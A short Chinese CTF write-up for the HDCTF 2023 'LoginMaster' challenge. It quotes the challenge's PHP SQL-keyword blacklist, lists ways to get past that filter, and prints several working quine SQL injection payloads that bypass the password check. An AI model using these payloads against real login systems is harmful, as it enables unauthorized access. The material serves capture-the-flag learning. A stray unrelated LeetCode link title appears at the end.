[HDCTF 2023]LoginMaster
知识点
quine注入
解题
用户名要为admin
查看robots.txt,查看源码
password是注入点
function checkSql($s)
{if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){alertMes('hacker', 'index.php');}
}
if ($row['password'] === $password) {die($FLAG);} else {alertMes("wrong password",'index.php');
绕过:
subst用mid绕过=,<,>,regexp等号可以用like代替sleep可以用benchmark代替
时间盲注得到表为空。
payload:
'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
 "力扣21-30题(数学的简单的结束和数组的前几道)")